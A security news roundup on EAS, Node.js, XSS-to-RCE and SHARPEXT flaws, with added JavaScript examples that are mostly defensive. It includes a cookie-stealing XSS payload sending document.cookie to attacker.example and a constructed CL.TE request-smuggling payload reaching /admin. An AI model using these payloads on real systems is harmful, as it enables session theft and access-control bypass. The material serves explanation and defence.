The advisory came on August 1 from DHS' Federal Emergency Management Agency (FEMA). Cybersecurity researcher Ken Pyle discovered the vulnerabilities.
"The EAS national test in 2021 was very similar to regular monthly tests typically originated by state authorities. During the test, radios and televisions across the country interrupted normal programming to play the EAS test message in English or Spanish," reports FEMA.
EAS is the U.S. national public warning system. It allows authorities to push emergency information to the public within about 10 minutes, interrupting TV and radio broadcasts to carry the alert.
Details of the bugs have not been disclosed, to prevent threat actors from exploiting them, but a proof of concept is expected to be presented at the DEF CON conference in Las Vegas next week.
In effect, the existence of the flaws is already public, and their details will be shown to a large audience within weeks.
To mitigate the vulnerabilities, operators are advised to update EAS devices to the latest software versions, place them behind a firewall, and review audit logs for signs of unauthorised access.
"The testing process is designed to evaluate the effectiveness of the IPAWS Open Platform for Emergency Networks and assess the operational readiness of the infrastructure for distribution of a national message and determine whether technological improvements are needed," reports FEMA.
The widely used DrayTek Vigor series of routers for small businesses has been found to have a significant pre-authentication remote code execution (RCE) vulnerability. Researchers caution that, if exploited, it may enable total device takeover as well as access to the wider network behind the router.
Researchers from PT Swarm found security bugs in three web applications: Evolution CMS, FUDforum, and GitBucket.
Even a basic XSS attack lets the threat actor's JavaScript run in the victim's browser, which opens the door to cookie theft, redirection to a phishing site, and much more.
Cross-Site Scripting (XSS) is one of the most common attacks against web apps. If a threat actor can inject JavaScript into the app's output, the result is not just stolen cookies; it can sometimes lead to complete compromise of the system. This post looks at how XSS-driven remote code execution was achieved in Evolution CMS, FUDforum, and GitBucket.
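The root cause in its smallest form, as an added example (not code from the PT Swarm write-up or from any of the three projects): one renderer concatenates user input into HTML, the other escapes it first, and a helper lists the element names in the output so the two can be compared. The host attacker.example in the payload is a placeholder.

```javascript
// Added example (not code from the PT Swarm write-up or any of the three projects):
// the root cause of XSS in its smallest form. One renderer concatenates user input
// into HTML; the other escapes it first. attacker.example is a placeholder host.

// Vulnerable: whatever the user supplies becomes part of the page's markup.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Fix for HTML text and quoted-attribute context: neutralise the five characters
// that can open a tag, close an attribute or introduce an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Lists the element names present in a fragment so the two renderers can be compared:
// any tag beyond the template's own <p> came from the input.
function tagNames(html) {
  return [...html.matchAll(/<\/?([A-Za-z][\w-]*)/g)].map((m) => m[1].toLowerCase());
}

// Constructed payload: the classic cookie-exfiltration one-liner the post describes.
// With unsafe rendering the <img> tag is real and its onerror handler runs in the
// victim's browser; with escaping it is inert text on the page.
const COOKIE_THEFT_PAYLOAD =
  `<img src=x onerror="fetch('https://attacker.example/c?' + document.cookie)">`;

console.log(tagNames(renderGreetingUnsafe(COOKIE_THEFT_PAYLOAD))); // [ 'p', 'img', 'p' ]
console.log(tagNames(renderGreetingSafe(COOKIE_THEFT_PAYLOAD)));   // [ 'p', 'p' ]
```

escapeHtml is only correct for HTML text and quoted attribute values; input landing inside a script block, a URL, or an unquoted attribute needs a context-specific encoder, which is why auto-escaping template engines and a Content Security Policy are the usual defence in depth.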
The first bug, in Evolution CMS v3.1.8, allows an attacker to launch a reflected XSS attack at various locations in the admin section. Aleksey Solovev says that in a successful attack on an administrator authenticated in the system, the index.php file will be overwritten with the code the attacker placed in the payload.
The second vulnerability, discovered in FUDforum v3.1.1, can let an attacker launch a stored XSS attack. Aleksey Solovev describes FUDforum as a super fast and scalable discussion forum that is highly customizable and supports unlimited members, forums, posts, topics, polls, and attachments.
The FUDforum admin panel has a file manager that allows uploading files to the server, including files with the PHP extension. An attacker can use the stored XSS to make an administrator's browser upload a PHP file that can then execute any command on the server.
The last vulnerability, in GitBucket v4.37.1, allows an attacker to launch a stored XSS attack at various locations. Aleksey Solovev says that with a stored XSS an attacker can try to exploit it in order to execute code on the server. The admin panel has a tool for running SQL queries, the Database viewer.
GitBucket uses the H2 Database Engine by default. For this database there is a publicly available exploit that achieves remote code execution. So all an attacker needs to do is create PoC code based on that exploit, upload it to the repository, and use it during the attack.
The threat actor SharpTongue, which is linked to North Korea, was found using a malicious extension for Chromium-based browsers to spy on victims' Gmail and AOL email accounts. Experts from cybersecurity firm Volexity track the group as SharpTongue; its activities overlap with those of the Kimsuky APT group.
SharpTongue's toolset was covered by Huntress in a 2021 report, but in September 2021 Volexity began observing a previously unreported malware strain. Over the past year Volexity has investigated several incidents involving SharpTongue, and in most of them the hackers used a malicious Microsoft Edge or Google Chrome extension known as "SHARPEXT."
Unlike other extensions used by the Kimsuky APT group, SHARPEXT doesn't steal usernames or passwords; instead it reads the target's webmail while they are browsing it. The current version of the extension supports three browsers and can steal the contents of emails from AOL webmail and Gmail accounts.
According to the report, SHARPEXT is a malicious browser extension deployed by SharpTongue after a successful compromise of the target system. The first versions of SHARPEXT that Volexity investigated supported only Google Chrome.
The current variant 3.0 supports three browsers:
The attack chain begins with the hackers manually extracting the files required to install the extension from the compromised workstation. After breaching the victim's Windows system, the hackers modify the browser's Preferences and Secure Preferences files.
The hackers then manually deploy SHARPEXT via a VBS script and enable the DevTools panel in the active tab to inspect the email contents and steal file attachments from the target's mailbox. This is done through a PowerShell script, which also hides the warning messages the browser shows when running developer-mode extensions.
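A hunt for that installation method, as an added example (not Volexity's tooling or its YARA rules): scan a Chromium Preferences file for extensions that were side-loaded rather than installed from the store. The key layout it relies on (extensions.settings.<id>.location, where 4 is taken to be the unpacked-directory location, plus from_webstore and path) is this example's reading of Chromium's preference format and should be verified against your browser build; the profile data is constructed.

```javascript
// Added example, not Volexity's tooling or its YARA rules: a hunt over a Chromium
// "Preferences" file for side-loaded, developer-mode extensions, the installation
// method described above. The key layout (extensions.settings.<id>.location, where
// 4 is the unpacked-directory location, plus from_webstore and path) is this
// example's reading of Chromium's preference format; verify it against your build.

const LOCATION_UNPACKED = 4; // assumed Chromium ManifestLocation value for unpacked extensions

function findSideloadedExtensions(prefs) {
  const settings = (prefs.extensions && prefs.extensions.settings) || {};
  const hits = [];
  for (const [id, ext] of Object.entries(settings)) {
    const reasons = [];
    if (ext.location === LOCATION_UNPACKED) reasons.push('unpacked (developer mode)');
    if (ext.from_webstore === false) reasons.push('not from the Web Store');
    // Store-installed extensions live under the profile as <id>\<version>; an absolute
    // path means the directory was chosen by whoever loaded it.
    if (typeof ext.path === 'string' && /^(?:[a-z]:\\|\/)/i.test(ext.path)) {
      reasons.push(`absolute install path ${ext.path}`);
    }
    if (reasons.length) hits.push({ id, path: ext.path, reasons });
  }
  return hits;
}

// Entry point for a file's contents: JSON.parse then scan.
function scanPreferencesJson(text) {
  return findSideloadedExtensions(JSON.parse(text));
}

// Constructed sample, not a real profile: one Web Store extension and one side-loaded
// from a user-writable directory, the pattern an operator would deploy with a script.
const SAMPLE_PREFERENCES = {
  extensions: {
    settings: {
      abcdefghijklmnopabcdefghijklmnop: {
        location: 1, from_webstore: true, state: 1,
        path: 'abcdefghijklmnopabcdefghijklmnop\\1.2.3_0',
      },
      ponmlkjihgfedcbaponmlkjihgfedcba: {
        location: LOCATION_UNPACKED, from_webstore: false, state: 1,
        path: 'C:\\Users\\victim\\AppData\\Local\\Temp\\ext',
      },
    },
  },
};

console.log(findSideloadedExtensions(SAMPLE_PREFERENCES)); // one hit: the ponm... extension
```

Run it over the Preferences file of each profile (for Chrome on Windows, %LOCALAPPDATA%\Google\Chrome\User Data\<profile>\Preferences; for Edge, the corresponding path under Microsoft\Edge). Secure Preferences carries the same extensions.settings structure and the report says the attackers edit both, so scan both files; a hit is a lead to triage, not proof of compromise, since developers legitimately load unpacked extensions.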
Security Affairs reports: "experts pointed out that this is the first time the threat actor used malicious browser extensions as part of the post-exploitation phase. Stealing email data from a user's already-logged-in session makes this attack stealthy and hard to be detected by the email provider. The researchers shared the YARA rules to detect these attacks and Indicators of Compromise (IOCs) for this threat."
Node.js maintainers have released patches for several flaws in the JavaScript runtime that can lead to HTTP request smuggling and arbitrary code execution, among other attacks. The advisory covers seven patched bugs, including three separate HTTP request smuggling vulnerabilities.
The three flaws, flawed parsing of Transfer-Encoding (CVE-2022-32213), incorrect delimiting of header fields (CVE-2022-32214), and improper parsing of multi-line Transfer-Encoding (CVE-2022-32215), can each lead to HTTP request smuggling.
The Daily Swig says "the moderate-severity implementation bug (CVE-2022-2097) could cause encryption to fail in some circumstances. AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimized implementation will not encrypt the entirety of the data, which could reveal sixteen bytes of data that was pre-existing in the memory that wasn’t written."
The three bugs are rated "medium" severity and affect the 18.x, 16.x, and 14.x release lines. The fixes are in llhttp v6.0.7 and llhttp v2.1.5, which have been updated inside Node.js.
The advisory also describes a DNS rebinding flaw in --inspect caused by improper IP address validation. Rated "high" severity, the bug (CVE-2022-32212) can allow arbitrary code execution, the advisory warns.
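What these three parser bugs have in common is the request-smuggling class: two hops that disagree on how a header is delimited, or on which framing header wins, carve the same byte stream into different requests, and the "extra" request reaches the back end with the front end's trust. The toy splitter below is an added example, not Node.js or llhttp code; its lenient modes are illustrative stand-ins rather than llhttp's actual defects, and the payload is constructed.

```javascript
// Added example, not Node.js or llhttp code: a toy HTTP/1.1 request splitter that
// shows the request-smuggling class behind the three llhttp fixes. Two hops that
// disagree on how a header is delimited, or on which framing header wins, carve the
// same byte stream into different requests. The lenient rules below are illustrative
// stand-ins, not llhttp's actual defects; the payload is constructed.

const CRLF = '\r\n';

const MODES = {
  'cl-first': { trimNames: false, prefer: 'cl', strict: false }, // e.g. a front-end proxy
  'te-first': { trimNames: true,  prefer: 'te', strict: false }, // e.g. a lenient back end
  'strict':   { trimNames: false, prefer: null, strict: true  }, // what a fixed parser should do
};

function parseHead(text, m) {
  const [reqLine, ...lines] = text.split(CRLF);
  const headers = {};
  for (const line of lines) {
    const i = line.indexOf(':');
    if (i < 0) throw new Error(`malformed header line: ${JSON.stringify(line)}`);
    let name = line.slice(0, i);
    if (m.strict && name !== name.trim()) throw new Error(`whitespace in header name: ${JSON.stringify(name)}`);
    if (m.trimNames) name = name.trim(); // lenient: "Transfer-Encoding " becomes Transfer-Encoding
    headers[name.toLowerCase()] = line.slice(i + 1).trim();
  }
  return { reqLine, headers };
}

// Decide how the body is framed: chunked, or a fixed Content-Length.
function framing(headers, m) {
  const te = headers['transfer-encoding'];
  const cl = headers['content-length'];
  if (m.strict && te !== undefined && cl !== undefined) throw new Error('both Content-Length and Transfer-Encoding present');
  const chunked = te !== undefined && (m.prefer === 'te' || cl === undefined);
  if (chunked) {
    if (m.strict && te !== 'chunked') throw new Error(`unsupported transfer-encoding: ${te}`);
    return { chunked: true };
  }
  if (cl !== undefined && !/^\d+$/.test(cl)) throw new Error(`bad content-length: ${cl}`);
  return { chunked: false, length: cl === undefined ? 0 : Number(cl) };
}

function readChunked(stream, pos) {
  let body = '';
  for (;;) {
    const eol = stream.indexOf(CRLF, pos);
    if (eol < 0) throw new Error('truncated chunk size');
    const size = parseInt(stream.slice(pos, eol), 16);
    if (Number.isNaN(size)) throw new Error('bad chunk size');
    pos = eol + 2;
    if (size === 0) return { body, pos: pos + 2 }; // last chunk, then the empty trailer line
    body += stream.slice(pos, pos + size);
    pos += size + 2; // chunk data plus its CRLF
  }
}

// Splits a byte stream into the sequence of requests a parser in the given mode would see.
function splitRequests(stream, mode) {
  const m = MODES[mode];
  const out = [];
  let pos = 0;
  while (pos < stream.length) {
    const end = stream.indexOf(CRLF + CRLF, pos);
    if (end < 0) throw new Error('incomplete request head');
    const head = parseHead(stream.slice(pos, end), m);
    pos = end + 4;
    const f = framing(head.headers, m);
    let body;
    if (f.chunked) ({ body, pos } = readChunked(stream, pos));
    else { body = stream.slice(pos, pos + f.length); pos += f.length; }
    out.push({ reqLine: head.reqLine, body });
  }
  return out;
}

// Constructed CL.TE payload. Content-Length covers the whole tail (37 bytes), while the
// chunked framing ends at the "0" chunk, leaving "GET /admin ..." as a second request.
// The space before the colon is the kind of delimiting quirk one hop tolerates and another does not.
const SMUGGLED = 'GET /admin HTTP/1.1' + CRLF + 'Host: a' + CRLF + CRLF;
const CL_TE_PAYLOAD =
  'POST / HTTP/1.1' + CRLF + 'Host: a' + CRLF +
  'Content-Length: 37' + CRLF + 'Transfer-Encoding : chunked' + CRLF + CRLF +
  '0' + CRLF + CRLF + SMUGGLED;

console.log(splitRequests(CL_TE_PAYLOAD, 'cl-first').length); // 1
console.log(splitRequests(CL_TE_PAYLOAD, 'te-first').length); // 2: the second is GET /admin
```

The strict mode shows the two rules that close the class regardless of which specific parsing quirk is involved: reject a message that carries both framing headers, and reject any header line that does not match the grammar exactly, instead of guessing what was meant. Until the upgraded llhttp is deployed, the practical check is to confirm every hop in front of Node (proxy, load balancer, CDN) normalises or rejects ambiguous framing.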
"The IsAllowedHost check can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid or not. When an invalid IPv4 address is provided browsers will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MitM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884," says the advisory.
The flaw affects all variants of the 18.x, 16.x, and 14.x releases lines.
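The defence the advisory describes rests on one idea: an IP literal in the Host header cannot be re-resolved by DNS, so it may pass, while a name must be on an allowlist. That makes the quality of the "is this an IP?" check the whole security boundary. The following is an added example, not Node.js source: a lax check beside a proper dotted-quad parser, wired into the same allowlist decision. The lax rule is illustrative, since the advisory does not state the exact string that bypassed Node's IsIPAddress, and the probe hosts are constructed.

```javascript
// Added example, not Node.js source: the host-allowlist pattern the advisory describes,
// with a lax "is this an IP?" check beside a proper one. The lax check is illustrative;
// the advisory does not state the exact string that bypassed Node's IsIPAddress.

// Lax: accepts anything made of digits and dots, or hex digits and colons.
function looksLikeIpLax(host) {
  return /^[\d.]+$/.test(host) || /^[0-9a-f:]+$/i.test(host);
}

// Proper dotted-quad check: exactly four decimal octets, 0-255, no leading zeros, no empty parts.
function isIPv4(host) {
  const parts = host.split('.');
  return parts.length === 4 &&
    parts.every((p) => /^(?:0|[1-9]\d{0,2})$/.test(p) && Number(p) <= 255);
}

// Minimal IPv6 literal check for the bracketed form browsers send in Host: [::1].
// Deliberately conservative: only loopback is recognised; everything else goes to the allowlist.
function isIPv6Loopback(host) {
  return host === '[::1]';
}

// The allowlist decision. isIp is injected so the two checks can be compared.
function isAllowedHost(hostHeader, isIp = isIPv4, allowedNames = ['localhost']) {
  const host = hostHeader.replace(/:\d+$/, '').toLowerCase(); // drop the port (assumed Host format)
  if (isIp(host) || isIPv6Loopback(host)) return true; // a literal address cannot be rebound
  return allowedNames.includes(host);                   // a name must be explicitly allowed
}

// Constructed Host values a page on an attacker-controlled origin could cause the browser to send.
const PROBES = ['127.0.0.1:9229', '1.2.3.4.5:9229', '[::1]:9229', 'localhost:9229', 'evil.example:9229'];

for (const h of PROBES) {
  console.log(h, 'lax:', isAllowedHost(h, looksLikeIpLax), 'strict:', isAllowedHost(h, isIPv4));
}
```

The string 1.2.3.4.5 is the shape of the problem, not a claim about what any browser resolves: which malformed hosts a browser hands to DNS depends on its URL host parser, and the check must not reason "looks numeric, therefore no DNS lookup happened". In Node itself, net.isIP(host) returns 4, 6 or 0 and is the right primitive for this decision; if the debugger must stay reachable over a name, bind it to loopback and tunnel rather than widening the allowlist.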